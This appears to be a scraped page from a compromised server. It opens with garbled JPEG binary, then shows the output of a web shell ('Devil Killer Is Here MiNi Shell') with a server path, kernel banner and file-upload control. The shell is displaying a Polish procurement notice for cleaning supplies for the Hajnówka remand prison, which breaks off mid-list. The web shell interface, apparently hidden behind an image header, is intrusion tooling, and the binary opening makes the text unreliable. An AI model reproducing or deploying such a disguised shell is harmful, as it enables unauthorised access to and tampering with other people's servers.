JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240202/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240202/0008918101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy środków czystości oraz akcesoriów do utrzymania czystości do Aresztu Śledczego w Hajnówce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARESZT ŚLEDCZY W HAJNÓWCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001252057</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Warszawska 67</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hajnówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 6832007</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">85 6832978</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">as_hajnowka@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy środków czystości oraz akcesoriów do utrzymania czystości do Aresztu Śledczego w Hajnówce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7130abfa-c1c4-11ee-a84d-d63fc4d19e65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00089181</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl oraz poczta elektroniczna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu oraz instrukcji dla Wykonawców Platformy Zakupowej Open Nexus</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wykonując obowiązek informacyjny, określony w art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO) informuję, że: administratorem danych osobowych w zakresie dokumentowania jest: Dyrektor Aresztu Śledczego w Hajnówce, z siedzibą przy ul. Warszawska 67, 17-200 Hajnówka, e-mail: as_hajnowka@sw.gov.pl, tel. 85 683 20 07. dane<br/>kontaktowe inspektora ochrony danych: e-mail: iod_as_hajnowka@sw.gov.pl. Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postępowaniu oraz następujące przepisy prawa: ustawy z dnia 11 września 2019 r. – Pzp; rozporządzenia<br/>Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia; ustawy z dnia 13 grudnia 2019 r. o narodowym zasobie archiwalnym i archiwach; art. 6 ust. 1 lit. b i c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO). W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego przysługują Państwu następujące uprawnienia: prawo dostępu do swoich danych oraz otrzymania ich kopii; prawo do sprostowania (poprawiania) swoich danych; prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa; prawo do wniesienia skargi do Prezesa UODO (z siedzibą w Warszawie, przy ul. Stawki 2, 00-193 Warszawa, więcej szczegółów na stronie internetowej: https://uodo.gov.pl/) – w przypadku, gdy przetwarzanie danych osobowych narusza przepisy dotyczące ochrony danych osobowych. Państwa pozyskane w związku z postępowaniem o udziel zam pub przetwarzane będą przez okres 5 lat: od dnia zakończenia postępowania o udzielenie zamówienia. Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówień publicznego przekazywane będę wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zam pub jest jawne. Ograniczenie dostępu Państwa danych o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 8 ust. 4 pkt 1 i 2 ustawy z dnia 11 września 2019 r. – Pzp. Ponadto odbiorcą danych zawartych w dokumentach związanych z post o zam pub mogą być podmioty z którymi Aresztu Śledczy w Hajnówce zawarł umowy lub porozumienia na korzystanie z udostępnianych przez nie usług w zakresie przekazywania lub archiwizowania danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych. Administrator Danych Osobowych nie będzie przekazywać Pana/Pani danych osobowych do państwa trzeciego lub organizacji międzynar. Państwa dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu. Podanie danych osobowych w związku z udziałem w post o zam pub nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie przepisów ustawy Pzp oraz wydawanych do niej przepisów wykonawczych, a w szczególności na podstawie Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKw.2232.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Kosz na śmieci w ilości 40 sztuk<br/>Wykonane z tworzywa sztucznego, z pokrywą, 8 – 10 L<br/>2)	Mydło w płynie opk. 5 L w ilości 500 sztuk<br/>Butelka plastikowa o gramaturze – 5 L<br/>Konsystencja – gęsta ciecz o kolorze charakterystycznym dla zastosowanego barwnika<br/>Właściwości – myjące, delikatne, niewysuszające rąk, zawiera glicerynę<br/>Zastosowanie – usuwa zabrudzenia<br/>ph - neutralne<br/>Zapach – charakterystyczny dla użytej kompozycji zapachowej<br/>3)	Szczotka do zamiatania w ilości 50 sztuk<br/>4)	Miska plastikowa w ilości 30 sztuk<br/>Wykonana z tworzywa sztucznego, 20 – 30 L<br/>5)	Szczotka na kij w ilości 50 sztuk<br/>Materiał wykonania – tworzywo sztuczne<br/>Gwintowana<br/>Długość – 24 cm, szerokość – 6.5 cm, wysokość – 7 cm<br/>6)	Worek foliowy w ilości 100 opakowań<br/>Materiał wykonania – folia HDPE<br/>Pakowane po 1000 sztuk<br/>Szerokość – 26 cm, długość – 35 cm, gramatura 5.5 mikrona<br/>Zastosowanie – przechowywanie / pakowanie żywności<br/>7)	Pasta BHP w ilości 50 sztuk<br/>Pasta do mycia rąk, opakowanie 05 kg; zawiera substancje ścierne oraz środek nawilżający i natłuszczający, który tworzy warstwę ochronną zapobiegającą wysuszaniu skóry rąk.<br/>8)	Płyn dezynfekcyjny do WC w okp 0,5 L w ilości 4000 sztuk<br/>Butelka plastikowa o gramaturze – 0.5 L<br/>Konsystencja – ciecz o kolorze charakterystycznym dla zastosowanego barwnika<br/>Właściwości – czyszczenie muszli klozetowych, umywalek, pisuarów, płytek ceramicznych itp.<br/>Zastosowanie – likwiduje zanieczyszczenia<br/>ph – 2 -5<br/>Zapach – charakterystyczny dla zastosowanej kompozycji zapachowej<br/>9)	Szczotka do WC w ilości 150 sztuk<br/>Pojemnik wykonany z tworzywa sztucznego, średnica: 14 cm, wysokość: 38 cm, szczotka z rączką wykonaną z tworzywa sztucznego oraz włosie syntetyczne<br/>10)	Wiadro w ilości 100 sztuk<br/>Wykonane z tworzywa sztucznego, 8 – 10 L;<br/>11)	Worki na śmieci 60L w ilości 400 opakowań<br/>Wykonane z folii HDPE, szerokość – 60 cm, wysokość – 70 cm, grubość – 7 mikronów, pakowane po 50 szt<br/>12)	Worki na śmieci 120L w ilości 400 opakowań<br/>Wykonane z folii LDPE, szerokość – 70 cm, wysokość – 110 cm, grubość – 22 mikrony, zgrzew dolny wzmocniony, pakowne po 25 szt<br/>13)	Worki na śmieci 160L w ilości 400 opakowań<br/>Wykonane z folii LDPE, szerokość – 90 cm, wysokość – 120cm, pakowane po 10 szt<br/>14)	Zmiotka z szufelką w ilości 200 kompletów<br/>Zmiotka wykonana z syntetycznego włosia, rozszczepione na końcach, oprawa zmiotki plastikowa, szufelka z gumową końcówką;<br/>15)	Zbierak podłogowy (ściągaczka) 50 sztuk<br/>Materiał wykonania - metalowy uchwyt, piankowa guma ściągająca<br/>Materiał odporny na korozję<br/>Szerokość nakładki zbierającej – 3 cm, Długość – 45 cm<br/>Zastosowanie – usuwanie wody z dużych powierzchni podłogowych<br/>16)	Papier toaletowy szary Jambo w ilości 2400 sztuk<br/>Dwuwarstwowy, makulaturowy, długość rolki – 100 m<br/>17)	Płyn do naczyń w opk. 0,2L w ilości 4500 sztuk<br/>Butelka plastikowa o gramaturze – 0.2 L<br/>Wygląd – ciecz, przezroczysta, jednorodna bez zanieczyszczeń<br/>Zapach – charakterystyczny dla danej kompozycji zapachowej<br/>Ph – 5 -6<br/>Właściwości – ręczne mycie naczyń, sprzętów kuchennych, powierzchni roboczych, porcelany, porcelitu, tworzyw sztucznych, stali nierdzewnej i aluminium<br/>Zastosowanie – skutecznie usuwa tłuszcz<br/>18)	Płyn do czyszczenia w opk. 0,5 L w ilości 1000 sztuk<br/>Butelka plastikowa o gramaturze – 0.5 L lub 1.0 L<br/>Konsystencja – ciecz o kolorze charakterystycznym dla zastosowanego barwnika<br/>Właściwości – mycie powierzchni PCV, glazury, terakoty<br/>Zastosowanie – likwiduje zanieczyszczenia, posiada właściwości odtłuszczające, nie pozostawia smug i osadu<br/>Zapach – charakterystyczny dla zastosowanej kompozycji zapachowej<br/>19)	Płyn do czyszczenia w opk. 1 L w ilości 300 sztuk<br/>Butelka plastikowa o gramaturze – 0.5 L lub 1.0 L<br/>Konsystencja – ciecz o kolorze charakterystycznym dla zastosowanego barwnika<br/>Właściwości – mycie powierzchni PCV, glazury, terakoty<br/>Zastosowanie – likwiduje zanieczyszczenia, posiada właściwości odtłuszczające, nie pozostawia smug i osadu<br/>Zapach – charakterystyczny dla zastosowanej kompozycji zapachowej<br/>20)	Trzonek do szczotki w ilości 60 sztuk<br/>21)	Mop do podłogi w ilości 300 sztuk<br/>Tworzywo – bawełna, pętelki myjące<br/>System kieszeniowy<br/>Frędzle wewnętrzne – 20mm<br/>Frędzle zewnętrzne – 22 mm<br/>Długość – 40 cm<br/>Zastosowanie – mycie i dezynfekcja wszelkich zmywalnych powierzchni podłogowych<br/>Przeznaczenie – gres, ceramika, linoleum, kamień naturalny i sztuczny, itp.<br/>22)	Mleczko do czyszczenia 0,75L - 1L w ilości 700 sztuk<br/>Do czyszczenia wszelkich powierzchni nie powodując tym samym zarysowań, zapach niedrażniący<br/>23)	Kij aluminiowy w ilości 80 sztuk<br/>Tworzywo – gryf wykonany z polipropylenu, rura - aluminium<br/>Średnica – 25 mm<br/>Długość – 140 cm<br/>Zastosowanie – mocowanie stelażu mopa<br/>24)	Podstawa do mopa w ilości 80 sztuk<br/>Tworzywo – polipropylen<br/>Długość – 40 cm<br/>Średnica otworu na kij – 25 mm<br/>Szerokość uchwytu – 10 cm<br/>Mocowanie typu speedy z mikrofibry lub bawełny<br/>Zastosowanie – mycie na mokro / dezynfekcja<br/>25)	Płyn do szyb w opk. 0.5 L w ilości 4000 sztuk<br/>Butelka plastikowa z atomizerem o gramaturze – 0.5 L<br/>Konsystencja – ciecz o kolorze charakterystycznym dla zastosowanego barwnika<br/>Właściwości – czyszczenie/ mycie szyb, luster, powierzchni szklanych i ceramicznych<br/>Zastosowanie – usuwanie kurzu, brudu i tłustych plam<br/>Zapach – charakterystyczny dla użytych środków<br/>ph – 8 – 11.5<br/>26)	Czyścik uniwersalny w opk. 0.3 kg w ilości 2400 sztuk<br/>Uniwersalny proszek do czyszczenia naczyń kuchenych i urządzeń sanitarnych, gramatura 0.3 kg<br/>27)	Koncentrat płynu do naczyń w opk. 5 L w ilości 500 sztuk<br/>Płyn do mycia naczyń o zapachu miętowym bądź innym, usuwa tłuszcz oraz inne zabrudzenia ; opakowanie 5L<br/>28)	Szampon do włosów w opk. 0.1 L w ilości 9500 sztuk<br/>Butelka plastikowa o gramaturze – 0.1 L<br/>Konsystencja – jednorodna ciecz bez zanieczyszczeń mechanicznych rozpuszczalna w wodzie w każdym stosunku<br/>Właściwości – płyn do mycia włosów<br/>Zapach – przyjemny, nie uczulający, nie drażniący<br/>Barwa – charakterystyczna dla zastosowanego barwnika<br/>ph – 1% wodnego roztworu 5 -7<br/>29)	Ręcznik papierowy ZZ w opk. 20 opk. w ilości 400 opakowań<br/>Wyrób celulozowy<br/>Pakowane po 20 opakowań<br/>30)	Proszek do prania w opk. 0.2 kg w ilości 9000 sztuk<br/>Opakowanie foliowe, saszetka gramatura – 0,200 kg<br/>Konsystencja – proszek o drobnej konsystencji<br/>Właściwości – uniwersalny, do prania białych i kolorowych rzeczy<br/>Zastosowanie – pranie ręczne, pralki automatyczne i wirnikowe<br/>Zakres temperatury prania – 30 – 95°C<br/>ph- max 11<br/>Nie uczulający, przyjemny zapach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39800000-0 - Środki czyszczące i polerujące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39200000-4 - Wyposażenie domowe</p> <p class="mb-0">39831000-6 - Preparaty piorące</p> <p class="mb-0">33760000-5 - Papier toaletowy, chusteczki higieniczne, ręczniki do rąk i serwety</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-10-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie do realizacji zamówienia osób społecznie marginalizowanych o których mowa w art. 94 ust. 1 pkt 5 Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Płyn uniwersalny typu Dolphin w ilości 250 litrów<br/>•	skutecznie myje i pielęgnuje<br/>•	zabezpiecza i nie pozostawia smug<br/>•	szybko odparowuje z powierzchni<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>2)	Płyn do mycia naczyń typu Dolphin w ilości 150 litrów<br/>•	efektywnie usuwa tłuste zabrudzenia<br/>•	skoncentrowany płyn do ręcznego mycia naczyń<br/>•	wydajny <br/>•	chroni skórę rąk przed wysuszaniem i podrażnieniem<br/>•	został przebadany mikrobiologicznie i dermatologicznie<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/><br/>3)	Mleczko do czyszczenia typu Cif w ilości 50 litrów<br/>•	uniwersalne mleczko czyszczące<br/>• zawiera naturalne kryształki czyszczące<br/>• skutecznie usuwa zabrudzenia i plamy<br/>• łagodny dla powierzchni nie uszkadza delikatnych powierzchni, takich jak emalia i lakier<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>4)	Kostka do WC typu Domestos w ilości 300 sztuk<br/>•	waga minimum 40g<br/>•	produkt zapobiega osadzaniu się kamienia <br/><br/>5)	Odświeżacz powietrza typu Ambi Pur w ilości 50 sztuk<br/>•	pojemność minimum 300 ml<br/>•	zamiast maskować oczyszcza powietrze z uporczywych, nieprzyjemnych zapachów, <br/>•	niepalny, w 100% naturalny gaz nośny<br/><br/>6)	Odkamieniacz w płynie typu Dolphin Sani Clean w ilości 50 litrów<br/>•	usuwa kamień, rdzę, osady z mydła i oporne zabrudzenia.<br/>•	zabezpiecza umytą powierzchnię przed ponownym osadzaniem się brudu (zawiera nanocząsteczki krzemu)<br/>•	nadaje połysk czyszczonym powierzchniom<br/>•	środek do mycia, pielęgnacji i zabezpieczania wszelkich powierzchni sanitarnych - umywalek, armatury, muszli klozetowych, sedesów.<br/>•	w opakowaniach od 0,5 do 5 litrów<br/><br/>7)	Mydło w płynie typu Dolphin w ilości 200 litrów<br/>•	dzięki zawartości lanoliny i gliceryny pielęgnuje i chroni dłonie zapobiegając nadmiernemu wysuszaniu i podrażnieniom dłoni.<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>8)	Środek do udrażniania do rur w ilości 15 litrów<br/>•	bezpieczny dla rur<br/>•	usuwa zatory i zanieczyszczenia z rur, zapewnia skuteczny przepływ wody<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>9)	Płyn do szyb typu Dolphin w ilości 150 litrów<br/>•	szybko i skutecznie myje, doczyszcza i 